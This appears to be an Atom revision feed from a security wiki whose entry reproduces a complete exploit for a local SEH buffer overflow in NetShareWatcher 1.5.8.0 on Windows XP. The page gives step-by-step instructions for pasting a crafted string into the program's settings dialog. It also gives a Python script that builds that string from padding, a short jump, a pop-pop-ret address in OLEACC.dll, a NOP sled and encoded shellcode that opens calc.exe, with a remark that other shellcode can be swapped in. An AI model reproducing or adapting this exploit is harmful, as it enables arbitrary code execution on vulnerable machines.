<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=NetShareWatcher_1.5.8.0_%E6%9C%AC%E5%9C%B0SEH%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>NetShareWatcher 1.5.8.0 本地SEH緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=NetShareWatcher_1.5.8.0_%E6%9C%AC%E5%9C%B0SEH%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=NetShareWatcher_1.5.8.0_%E6%9C%AC%E5%9C%B0SEH%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T02:36:58Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=NetShareWatcher_1.5.8.0_%E6%9C%AC%E5%9C%B0SEH%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2025&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow # Date: 2019-03-19 # Vendor Homepage: http://netsharewatcher.nsauditor.com # Software Link:  http:...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=NetShareWatcher_1.5.8.0_%E6%9C%AC%E5%9C%B0SEH%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2025&amp;oldid=prev"/>
		<updated>2021-05-02T04:47:22Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow # Date: 2019-03-19 # Vendor Homepage: http://netsharewatcher.nsauditor.com # Software Link:  http:...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow&lt;br /&gt;
# Date: 2019-03-19&lt;br /&gt;
# Vendor Homepage: http://netsharewatcher.nsauditor.com&lt;br /&gt;
# Software Link:  http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe&lt;br /&gt;
# Exploit Author: Peyman Forouzan&lt;br /&gt;
# Tested Version: 1.5.8.0&lt;br /&gt;
# Tested on: Windows XP SP2 - SP3&lt;br /&gt;
&lt;br /&gt;
# 1- Run python code : NetShareWatcher.py&lt;br /&gt;
# 2- Open Exploit.txt and copy content to clipboard&lt;br /&gt;
# 3- Open NetShareWatcher&lt;br /&gt;
# 4- Setting --&amp;gt; Defaults --&amp;gt; Restrictions --&amp;gt; Add --&amp;gt; Custome&lt;br /&gt;
# 5- Paste the content of Exploit.txt into the box&lt;br /&gt;
# 6- Click 'Find'&lt;br /&gt;
# 7- Calc.exe Open ( Can be replaced with Shellcode )&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
buffer = &amp;quot;\x41&amp;quot; * 262&lt;br /&gt;
nseh = &amp;quot;\xeb\x14\x90\x90&amp;quot;  # Overwrite Next Seh With Short jmp&lt;br /&gt;
seh = &amp;quot;\x90\xBF\xC9\x74&amp;quot;   # Overwrite Seh / pop esi pop ebx retn [OLEACC.dll]&lt;br /&gt;
nops = &amp;quot;\x90&amp;quot; * 20&lt;br /&gt;
&lt;br /&gt;
# Calc.exe payload [size 227]&lt;br /&gt;
buf =&amp;quot;&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x9a\xca\xc0&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
payload = buffer + nseh + seh + nops + buf&lt;br /&gt;
try:&lt;br /&gt;
    f=open(&amp;quot;Exploit.txt&amp;quot;,&amp;quot;w&amp;quot;)&lt;br /&gt;
    print &amp;quot;[+] Creating %s bytes payload..&amp;quot; %len(payload)&lt;br /&gt;
    f.write(payload)&lt;br /&gt;
    f.close()&lt;br /&gt;
    print &amp;quot;[+] File created!&amp;quot;&lt;br /&gt;
except:&lt;br /&gt;
    print &amp;quot;File can't be created&amp;quot;&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>